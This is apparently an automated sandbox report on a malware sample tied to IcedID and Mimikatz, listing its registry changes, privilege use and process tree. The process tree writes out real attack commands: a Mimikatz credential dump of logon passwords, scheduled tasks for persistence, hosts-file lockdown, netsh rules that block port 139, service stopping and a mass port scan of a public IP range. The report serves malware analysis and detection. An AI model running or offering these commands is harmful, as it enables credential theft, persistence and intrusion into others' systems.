\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language net1.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language net1.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cacls.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language net.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language netsh.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language netsh.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language net.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language net1.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language net.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language btuizeiim.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cacls.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language net.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language net1.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language xohudmc.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language PING.EXE Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language net1.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language netsh.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language netsh.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language net1.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language net.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language netsh.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language netsh.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language 2024-12-21_00480422fe8d80a2c60f739cafb1f753_hacktools_icedid_mimikatz.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cacls.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language net.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language net1.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language netsh.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language netsh.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language mgmtcbi.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language netsh.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language net1.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language net1.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cacls.exe -
System Network Configuration Discovery: Internet Connection Discovery 1 TTPs 2 IoCs
Adversaries may check for Internet connectivity on compromised systems.
pid Process 4328 cmd.exe 4680 PING.EXE -
NSIS installer 3 IoCs
resource yara_rule behavioral2/files/0x0007000000023c9e-6.dat nsis_installer_2 behavioral2/files/0x0007000000023cb4-15.dat nsis_installer_1 behavioral2/files/0x0007000000023cb4-15.dat nsis_installer_2 -
Modifies data under HKEY_USERS 43 IoCs
description ioc Process Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\WinTrust\Trust Providers\Software Publishing iyibcmiuc.exe Key created \REGISTRY\USER\.DEFAULT\Software iyibcmiuc.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Sysinternals\ProcDump\EulaAccepted = "1" iyibcmiuc.exe Key created \REGISTRY\USER\.DEFAULT\Software\Sysinternals\ProcDump iyibcmiuc.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Sysinternals\ProcDump\EulaAccepted = "1" iyibcmiuc.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Sysinternals\ProcDump\EulaAccepted = "1" iyibcmiuc.exe Key created \REGISTRY\USER\.DEFAULT\Software\Sysinternals\ProcDump iyibcmiuc.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\UNCAsIntranet = "1" mgmtcbi.exe Key created \REGISTRY\USER\.DEFAULT\Software\Sysinternals iyibcmiuc.exe Key created \REGISTRY\USER\.DEFAULT\Software\Sysinternals\ProcDump iyibcmiuc.exe Key created \REGISTRY\USER\.DEFAULT\Software\Sysinternals\ProcDump iyibcmiuc.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\IntranetName = "1" mgmtcbi.exe Key created \REGISTRY\USER\.DEFAULT\Software\Sysinternals\ProcDump iyibcmiuc.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Sysinternals\ProcDump\EulaAccepted = "1" iyibcmiuc.exe Key created \REGISTRY\USER\.DEFAULT\Software\Sysinternals\ProcDump iyibcmiuc.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Sysinternals\ProcDump\EulaAccepted = "1" iyibcmiuc.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Sysinternals\ProcDump\EulaAccepted = "1" iyibcmiuc.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Sysinternals\ProcDump\EulaAccepted = "1" iyibcmiuc.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\ mgmtcbi.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Sysinternals\ProcDump\EulaAccepted = "1" iyibcmiuc.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Sysinternals\ProcDump\EulaAccepted = "1" iyibcmiuc.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Sysinternals\ProcDump\EulaAccepted = "1" iyibcmiuc.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Sysinternals\ProcDump\EulaAccepted = "1" iyibcmiuc.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Sysinternals\ProcDump\EulaAccepted = "1" iyibcmiuc.exe Key created \REGISTRY\USER\.DEFAULT\Software\Sysinternals\ProcDump iyibcmiuc.exe Key created \REGISTRY\USER\.DEFAULT\Software\Sysinternals\ProcDump iyibcmiuc.exe Key created \REGISTRY\USER\.DEFAULT\Software\Sysinternals\ProcDump iyibcmiuc.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Sysinternals\ProcDump\EulaAccepted = "1" iyibcmiuc.exe Key created \REGISTRY\USER\.DEFAULT\Software\Sysinternals\ProcDump iyibcmiuc.exe Key created \REGISTRY\USER\.DEFAULT\Software\Sysinternals\ProcDump iyibcmiuc.exe Key created \REGISTRY\USER\.DEFAULT\Software\Sysinternals\ProcDump iyibcmiuc.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\ProxyBypass = "1" mgmtcbi.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\AutoDetect = "0" mgmtcbi.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Sysinternals\ProcDump\EulaAccepted = "1" iyibcmiuc.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Sysinternals\ProcDump\EulaAccepted = "1" iyibcmiuc.exe Key created \REGISTRY\USER\.DEFAULT\Software\Sysinternals\ProcDump iyibcmiuc.exe Key created \REGISTRY\USER\.DEFAULT\Software\Sysinternals\ProcDump iyibcmiuc.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Sysinternals\ProcDump\EulaAccepted = "1" iyibcmiuc.exe Key created \REGISTRY\USER\.DEFAULT\Software\Sysinternals\ProcDump iyibcmiuc.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\WinTrust\Trust Providers\Software Publishing mgmtcbi.exe Key created \REGISTRY\USER\.DEFAULT\Software\Sysinternals\ProcDump iyibcmiuc.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Sysinternals\ProcDump\EulaAccepted = "1" iyibcmiuc.exe Key created \REGISTRY\USER\.DEFAULT\Software\Sysinternals\ProcDump iyibcmiuc.exe -
Modifies registry class 14 IoCs
description ioc Process Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\.cmd\ = "txtfile" mgmtcbi.exe Key created \REGISTRY\MACHINE\SOFTWARE\Classes\.vbe\ mgmtcbi.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\.VBE\ = "txtfile" mgmtcbi.exe Key created \REGISTRY\MACHINE\SOFTWARE\Classes\.reg\ mgmtcbi.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\.bat\ = "txtfile" mgmtcbi.exe Key created \REGISTRY\MACHINE\SOFTWARE\Classes\.js\ mgmtcbi.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\.vbs\ = "txtfile" mgmtcbi.exe Key created \REGISTRY\MACHINE\SOFTWARE\Classes\.cmd\ mgmtcbi.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\.ps1\ = "txtfile" mgmtcbi.exe Key created \REGISTRY\MACHINE\SOFTWARE\Classes\.bat\ mgmtcbi.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\.js\ = "txtfile" mgmtcbi.exe Key created \REGISTRY\MACHINE\SOFTWARE\Classes\.vbs\ mgmtcbi.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\.reg\ = "txtfile" mgmtcbi.exe Key created \REGISTRY\MACHINE\SOFTWARE\Classes\.ps1\ mgmtcbi.exe -
Runs net.exe
-
Runs ping.exe 1 TTPs 1 IoCs
pid Process 4680 PING.EXE -
Scheduled Task/Job: Scheduled Task 1 TTPs 3 IoCs
Schtasks is often used by malware for persistence or to perform post-infection execution.
pid Process 3428 schtasks.exe 3524 schtasks.exe 1380 schtasks.exe -
Suspicious behavior: EnumeratesProcesses 64 IoCs
pid Process 4376 mgmtcbi.exe 4376 mgmtcbi.exe 4376 mgmtcbi.exe 4376 mgmtcbi.exe 4376 mgmtcbi.exe 4376 mgmtcbi.exe 4376 mgmtcbi.exe 4376 mgmtcbi.exe 4376 mgmtcbi.exe 4376 mgmtcbi.exe 4376 mgmtcbi.exe 4376 mgmtcbi.exe 4376 mgmtcbi.exe 4376 mgmtcbi.exe 4376 mgmtcbi.exe 4376 mgmtcbi.exe 4376 mgmtcbi.exe 4376 mgmtcbi.exe 4376 mgmtcbi.exe 4376 mgmtcbi.exe 4376 mgmtcbi.exe 4376 mgmtcbi.exe 4376 mgmtcbi.exe 4376 mgmtcbi.exe 4376 mgmtcbi.exe 4376 mgmtcbi.exe 4376 mgmtcbi.exe 4376 mgmtcbi.exe 4376 mgmtcbi.exe 4376 mgmtcbi.exe 4376 mgmtcbi.exe 4376 mgmtcbi.exe 4376 mgmtcbi.exe 4376 mgmtcbi.exe 4376 mgmtcbi.exe 4376 mgmtcbi.exe 4376 mgmtcbi.exe 4376 mgmtcbi.exe 4376 mgmtcbi.exe 4376 mgmtcbi.exe 4376 mgmtcbi.exe 4376 mgmtcbi.exe 4376 mgmtcbi.exe 4376 mgmtcbi.exe 4376 mgmtcbi.exe 4376 mgmtcbi.exe 4376 mgmtcbi.exe 4376 mgmtcbi.exe 4376 mgmtcbi.exe 4376 mgmtcbi.exe 4376 mgmtcbi.exe 4376 mgmtcbi.exe 4376 mgmtcbi.exe 4376 mgmtcbi.exe 4376 mgmtcbi.exe 4376 mgmtcbi.exe 4376 mgmtcbi.exe 4376 mgmtcbi.exe 4376 mgmtcbi.exe 4376 mgmtcbi.exe 4376 mgmtcbi.exe 4376 mgmtcbi.exe 4376 mgmtcbi.exe 4376 mgmtcbi.exe -
Suspicious behavior: LoadsDriver 15 IoCs
pid Process 652 Process not Found 652 Process not Found 652 Process not Found 652 Process not Found 652 Process not Found 652 Process not Found 652 Process not Found 652 Process not Found 652 Process not Found 652 Process not Found 652 Process not Found 652 Process not Found 652 Process not Found 652 Process not Found 652 Process not Found -
Suspicious behavior: RenamesItself 1 IoCs
pid Process 1644 2024-12-21_00480422fe8d80a2c60f739cafb1f753_hacktools_icedid_mimikatz.exe -
Suspicious use of AdjustPrivilegeToken 23 IoCs
description pid Process Token: SeDebugPrivilege 1644 2024-12-21_00480422fe8d80a2c60f739cafb1f753_hacktools_icedid_mimikatz.exe Token: SeDebugPrivilege 4516 mgmtcbi.exe Token: SeDebugPrivilege 4376 mgmtcbi.exe Token: SeDebugPrivilege 3436 vfshost.exe Token: SeDebugPrivilege 5028 iyibcmiuc.exe Token: SeLockMemoryPrivilege 2908 ltbtbc.exe Token: SeLockMemoryPrivilege 2908 ltbtbc.exe Token: SeDebugPrivilege 2468 iyibcmiuc.exe Token: SeDebugPrivilege 2016 iyibcmiuc.exe Token: SeDebugPrivilege 1116 iyibcmiuc.exe Token: SeDebugPrivilege 3124 iyibcmiuc.exe Token: SeDebugPrivilege 2576 iyibcmiuc.exe Token: SeDebugPrivilege 2792 iyibcmiuc.exe Token: SeDebugPrivilege 1164 iyibcmiuc.exe Token: SeDebugPrivilege 4980 iyibcmiuc.exe Token: SeDebugPrivilege 2176 iyibcmiuc.exe Token: SeDebugPrivilege 4104 iyibcmiuc.exe Token: SeDebugPrivilege 2732 iyibcmiuc.exe Token: SeDebugPrivilege 4120 iyibcmiuc.exe Token: SeDebugPrivilege 3328 iyibcmiuc.exe Token: SeDebugPrivilege 864 iyibcmiuc.exe Token: SeDebugPrivilege 1584 iyibcmiuc.exe Token: SeDebugPrivilege 792 iyibcmiuc.exe -
Suspicious use of SetWindowsHookEx 12 IoCs
pid Process 1644 2024-12-21_00480422fe8d80a2c60f739cafb1f753_hacktools_icedid_mimikatz.exe 1644 2024-12-21_00480422fe8d80a2c60f739cafb1f753_hacktools_icedid_mimikatz.exe 4516 mgmtcbi.exe 4516 mgmtcbi.exe 4376 mgmtcbi.exe 4376 mgmtcbi.exe 3436 xohudmc.exe 2940 rwdxsq.exe 2888 mgmtcbi.exe 2888 mgmtcbi.exe 4296 mgmtcbi.exe 4296 mgmtcbi.exe -
Suspicious use of WriteProcessMemory 64 IoCs
description pid Process procid_target PID 1644 wrote to memory of 4328 1644 2024-12-21_00480422fe8d80a2c60f739cafb1f753_hacktools_icedid_mimikatz.exe 82 PID 1644 wrote to memory of 4328 1644 2024-12-21_00480422fe8d80a2c60f739cafb1f753_hacktools_icedid_mimikatz.exe 82 PID 1644 wrote to memory of 4328 1644 2024-12-21_00480422fe8d80a2c60f739cafb1f753_hacktools_icedid_mimikatz.exe 82 PID 4328 wrote to memory of 4680 4328 cmd.exe 84 PID 4328 wrote to memory of 4680 4328 cmd.exe 84 PID 4328 wrote to memory of 4680 4328 cmd.exe 84 PID 4328 wrote to memory of 4516 4328 cmd.exe 89 PID 4328 wrote to memory of 4516 4328 cmd.exe 89 PID 4328 wrote to memory of 4516 4328 cmd.exe 89 PID 4376 wrote to memory of 4372 4376 mgmtcbi.exe 91 PID 4376 wrote to memory of 4372 4376 mgmtcbi.exe 91 PID 4376 wrote to memory of 4372 4376 mgmtcbi.exe 91 PID 4372 wrote to memory of 4912 4372 cmd.exe 93 PID 4372 wrote to memory of 4912 4372 cmd.exe 93 PID 4372 wrote to memory of 4912 4372 cmd.exe 93 PID 4372 wrote to memory of 2172 4372 cmd.exe 94 PID 4372 wrote to memory of 2172 4372 cmd.exe 94 PID 4372 wrote to memory of 2172 4372 cmd.exe 94 PID 4372 wrote to memory of 4076 4372 cmd.exe 95 PID 4372 wrote to memory of 4076 4372 cmd.exe 95 PID 4372 wrote to memory of 4076 4372 cmd.exe 95 PID 4372 wrote to memory of 4196 4372 cmd.exe 96 PID 4372 wrote to memory of 4196 4372 cmd.exe 96 PID 4372 wrote to memory of 4196 4372 cmd.exe 96 PID 4372 wrote to memory of 4964 4372 cmd.exe 97 PID 4372 wrote to memory of 4964 4372 cmd.exe 97 PID 4372 wrote to memory of 4964 4372 cmd.exe 97 PID 4372 wrote to memory of 5080 4372 cmd.exe 98 PID 4372 wrote to memory of 5080 4372 cmd.exe 98 PID 4372 wrote to memory of 5080 4372 cmd.exe 98 PID 4376 wrote to memory of 408 4376 mgmtcbi.exe 99 PID 4376 wrote to memory of 408 4376 mgmtcbi.exe 99 PID 4376 wrote to memory of 408 4376 mgmtcbi.exe 99 PID 4376 wrote to memory of 3964 4376 mgmtcbi.exe 102 PID 4376 wrote to memory of 3964 4376 mgmtcbi.exe 102 PID 4376 wrote to memory of 3964 4376 mgmtcbi.exe 102 PID 4376 wrote to memory of 3524 4376 mgmtcbi.exe 104 PID 4376 wrote to memory of 3524 4376 mgmtcbi.exe 104 PID 4376 wrote to memory of 3524 4376 mgmtcbi.exe 104 PID 4376 wrote to memory of 2020 4376 mgmtcbi.exe 108 PID 4376 wrote to memory of 2020 4376 mgmtcbi.exe 108 PID 4376 wrote to memory of 2020 4376 mgmtcbi.exe 108 PID 2020 wrote to memory of 3716 2020 cmd.exe 110 PID 2020 wrote to memory of 3716 2020 cmd.exe 110 PID 2020 wrote to memory of 3716 2020 cmd.exe 110 PID 3716 wrote to memory of 3732 3716 wpcap.exe 111 PID 3716 wrote to memory of 3732 3716 wpcap.exe 111 PID 3716 wrote to memory of 3732 3716 wpcap.exe 111 PID 3732 wrote to memory of 636 3732 net.exe 113 PID 3732 wrote to memory of 636 3732 net.exe 113 PID 3732 wrote to memory of 636 3732 net.exe 113 PID 3716 wrote to memory of 660 3716 wpcap.exe 114 PID 3716 wrote to memory of 660 3716 wpcap.exe 114 PID 3716 wrote to memory of 660 3716 wpcap.exe 114 PID 660 wrote to memory of 3904 660 net.exe 116 PID 660 wrote to memory of 3904 660 net.exe 116 PID 660 wrote to memory of 3904 660 net.exe 116 PID 3716 wrote to memory of 224 3716 wpcap.exe 117 PID 3716 wrote to memory of 224 3716 wpcap.exe 117 PID 3716 wrote to memory of 224 3716 wpcap.exe 117 PID 224 wrote to memory of 3464 224 net.exe 119 PID 224 wrote to memory of 3464 224 net.exe 119 PID 224 wrote to memory of 3464 224 net.exe 119 PID 3716 wrote to memory of 3140 3716 wpcap.exe 120
Processes
-
C:\Windows\System32\spoolsv.exeC:\Windows\System32\spoolsv.exe1⤵PID:1392
-
C:\Windows\TEMP\untipbtiz\ltbtbc.exe"C:\Windows\TEMP\untipbtiz\ltbtbc.exe"2⤵
- Executes dropped EXE
- Suspicious use of AdjustPrivilegeToken
PID:2908
-
-
C:\Users\Admin\AppData\Local\Temp\2024-12-21_00480422fe8d80a2c60f739cafb1f753_hacktools_icedid_mimikatz.exe"C:\Users\Admin\AppData\Local\Temp\2024-12-21_00480422fe8d80a2c60f739cafb1f753_hacktools_icedid_mimikatz.exe"1⤵
- Drops file in Windows directory
- System Location Discovery: System Language Discovery
- Suspicious behavior: RenamesItself
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of SetWindowsHookEx
- Suspicious use of WriteProcessMemory
PID:1644 -
C:\Windows\SysWOW64\cmd.execmd /c ping 127.0.0.1 -n 5 & Start C:\Windows\ybemumnz\mgmtcbi.exe2⤵
- System Location Discovery: System Language Discovery
- System Network Configuration Discovery: Internet Connection Discovery
- Suspicious use of WriteProcessMemory
PID:4328 -
C:\Windows\SysWOW64\PING.EXEping 127.0.0.1 -n 53⤵
- System Location Discovery: System Language Discovery
- System Network Configuration Discovery: Internet Connection Discovery
- Runs ping.exe
PID:4680
-
-
C:\Windows\ybemumnz\mgmtcbi.exeC:\Windows\ybemumnz\mgmtcbi.exe3⤵
- Executes dropped EXE
- System Location Discovery: System Language Discovery
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of SetWindowsHookEx
PID:4516
-
-
-
C:\Windows\ybemumnz\mgmtcbi.exeC:\Windows\ybemumnz\mgmtcbi.exe1⤵
- Suspicious use of NtCreateUserProcessOtherParentProcess
- Drops file in Drivers directory
- Event Triggered Execution: Image File Execution Options Injection
- Executes dropped EXE
- Drops file in System32 directory
- Drops file in Windows directory
- Modifies data under HKEY_USERS
- Modifies registry class
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of SetWindowsHookEx
- Suspicious use of WriteProcessMemory
PID:4376 -
C:\Windows\SysWOW64\cmd.execmd /c echo Y|cacls C:\Windows\system32\drivers\etc\hosts /T /D users & echo Y|cacls C:\Windows\system32\drivers\etc\hosts /T /D administrators & echo Y|cacls C:\Windows\system32\drivers\etc\hosts /T /D SYSTEM2⤵
- Suspicious use of WriteProcessMemory
PID:4372 -
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" echo Y"3⤵
- System Location Discovery: System Language Discovery
PID:4912
-
-
C:\Windows\SysWOW64\cacls.execacls C:\Windows\system32\drivers\etc\hosts /T /D users3⤵
- System Location Discovery: System Language Discovery
PID:2172
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" echo Y"3⤵PID:4076
-
-
C:\Windows\SysWOW64\cacls.execacls C:\Windows\system32\drivers\etc\hosts /T /D administrators3⤵PID:4196
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" echo Y"3⤵
- System Location Discovery: System Language Discovery
PID:4964
-
-
C:\Windows\SysWOW64\cacls.execacls C:\Windows\system32\drivers\etc\hosts /T /D SYSTEM3⤵
- System Location Discovery: System Language Discovery
PID:5080
-
-
-
C:\Windows\SysWOW64\netsh.exenetsh ipsec static del all2⤵
- Event Triggered Execution: Netsh Helper DLL
- System Location Discovery: System Language Discovery
PID:408
-
-
C:\Windows\SysWOW64\netsh.exenetsh ipsec static add policy name=Bastards description=FuckingBastards2⤵
- Event Triggered Execution: Netsh Helper DLL
- System Location Discovery: System Language Discovery
PID:3964
-
-
C:\Windows\SysWOW64\netsh.exenetsh ipsec static add filteraction name=BastardsList action=block2⤵
- Event Triggered Execution: Netsh Helper DLL
PID:3524
-
-
C:\Windows\SysWOW64\cmd.execmd /c C:\Windows\jhetmctcv\bctzbzczb\wpcap.exe /S2⤵
- System Location Discovery: System Language Discovery
- Suspicious use of WriteProcessMemory
PID:2020 -
C:\Windows\jhetmctcv\bctzbzczb\wpcap.exeC:\Windows\jhetmctcv\bctzbzczb\wpcap.exe /S3⤵
- Drops file in Drivers directory
- Executes dropped EXE
- Loads dropped DLL
- Drops file in System32 directory
- Drops file in Program Files directory
- System Location Discovery: System Language Discovery
- Suspicious use of WriteProcessMemory
PID:3716 -
C:\Windows\SysWOW64\net.exenet stop "Boundary Meter"4⤵
- Suspicious use of WriteProcessMemory
PID:3732 -
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop "Boundary Meter"5⤵
- System Location Discovery: System Language Discovery
PID:636
-
-
-
C:\Windows\SysWOW64\net.exenet stop "TrueSight Meter"4⤵
- System Location Discovery: System Language Discovery
- Suspicious use of WriteProcessMemory
PID:660 -
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop "TrueSight Meter"5⤵
- System Location Discovery: System Language Discovery
PID:3904
-
-
-
C:\Windows\SysWOW64\net.exenet stop npf4⤵
- System Location Discovery: System Language Discovery
- Suspicious use of WriteProcessMemory
PID:224 -
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop npf5⤵
- System Location Discovery: System Language Discovery
PID:3464
-
-
-
C:\Windows\SysWOW64\net.exenet start npf4⤵
- System Location Discovery: System Language Discovery
PID:3140 -
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 start npf5⤵
- System Location Discovery: System Language Discovery
PID:1480
-
-
-
-
-
C:\Windows\SysWOW64\cmd.execmd /c net start npf2⤵
- System Location Discovery: System Language Discovery
PID:4856 -
C:\Windows\SysWOW64\net.exenet start npf3⤵
- System Location Discovery: System Language Discovery
PID:4020 -
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 start npf4⤵
- System Location Discovery: System Language Discovery
PID:396
-
-
-
-
C:\Windows\SysWOW64\cmd.execmd /c net start npf2⤵PID:4460
-
C:\Windows\SysWOW64\net.exenet start npf3⤵PID:2336
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 start npf4⤵
- System Location Discovery: System Language Discovery
PID:1048
-
-
-
-
C:\Windows\SysWOW64\cmd.execmd /c C:\Windows\jhetmctcv\bctzbzczb\liuibviiz.exe -p 80 222.186.128.1-222.186.255.255 --rate=1024 -oJ C:\Windows\jhetmctcv\bctzbzczb\Scant.txt2⤵
- System Location Discovery: System Language Discovery
PID:4284 -
C:\Windows\jhetmctcv\bctzbzczb\liuibviiz.exeC:\Windows\jhetmctcv\bctzbzczb\liuibviiz.exe -p 80 222.186.128.1-222.186.255.255 --rate=1024 -oJ C:\Windows\jhetmctcv\bctzbzczb\Scant.txt3⤵
- Executes dropped EXE
- Loads dropped DLL
- System Location Discovery: System Language Discovery
PID:1052
-
-
-
C:\Windows\SysWOW64\cmd.execmd /c C:\Windows\jhetmctcv\Corporate\vfshost.exe privilege::debug sekurlsa::logonpasswords exit >> C:\Windows\jhetmctcv\Corporate\log.txt2⤵
- Drops file in Windows directory
- System Location Discovery: System Language Discovery
PID:664 -
C:\Windows\jhetmctcv\Corporate\vfshost.exeC:\Windows\jhetmctcv\Corporate\vfshost.exe privilege::debug sekurlsa::logonpasswords exit3⤵
- Executes dropped EXE
- Suspicious use of AdjustPrivilegeToken
PID:3436
-
-
-
C:\Windows\SysWOW64\cmd.execmd /c echo Y|schtasks /create /sc minute /mo 1 /tn "jbemublie" /ru system /tr "cmd /c C:\Windows\ime\mgmtcbi.exe"2⤵PID:4196
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" echo Y"3⤵PID:1688
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /create /sc minute /mo 1 /tn "jbemublie" /ru system /tr "cmd /c C:\Windows\ime\mgmtcbi.exe"3⤵
- Scheduled Task/Job: Scheduled Task
PID:1380
-
-
-
C:\Windows\SysWOW64\cmd.execmd /c echo Y|schtasks /create /sc minute /mo 1 /tn "umbbbtict" /ru system /tr "cmd /c echo Y|cacls C:\Windows\ybemumnz\mgmtcbi.exe /p everyone:F"2⤵
- System Location Discovery: System Language Discovery
PID:1884 -
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" echo Y"3⤵
- System Location Discovery: System Language Discovery
PID:2884
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /create /sc minute /mo 1 /tn "umbbbtict" /ru system /tr "cmd /c echo Y|cacls C:\Windows\ybemumnz\mgmtcbi.exe /p everyone:F"3⤵
- System Location Discovery: System Language Discovery
- Scheduled Task/Job: Scheduled Task
PID:3428
-
-
-
C:\Windows\SysWOW64\cmd.execmd /c echo Y|schtasks /create /sc minute /mo 1 /tn "bwctviivv" /ru system /tr "cmd /c echo Y|cacls C:\Windows\TEMP\untipbtiz\ltbtbc.exe /p everyone:F"2⤵
- System Location Discovery: System Language Discovery
PID:5000 -
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" echo Y"3⤵
- System Location Discovery: System Language Discovery
PID:1012
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /create /sc minute /mo 1 /tn "bwctviivv" /ru system /tr "cmd /c echo Y|cacls C:\Windows\TEMP\untipbtiz\ltbtbc.exe /p everyone:F"3⤵
- System Location Discovery: System Language Discovery
- Scheduled Task/Job: Scheduled Task
PID:3524
-
-
-
C:\Windows\SysWOW64\netsh.exenetsh ipsec static add filter filterlist=BastardsList srcaddr=any dstaddr=Me dstport=139 protocol=TCP2⤵
- Event Triggered Execution: Netsh Helper DLL
- System Location Discovery: System Language Discovery
PID:1204
-
-
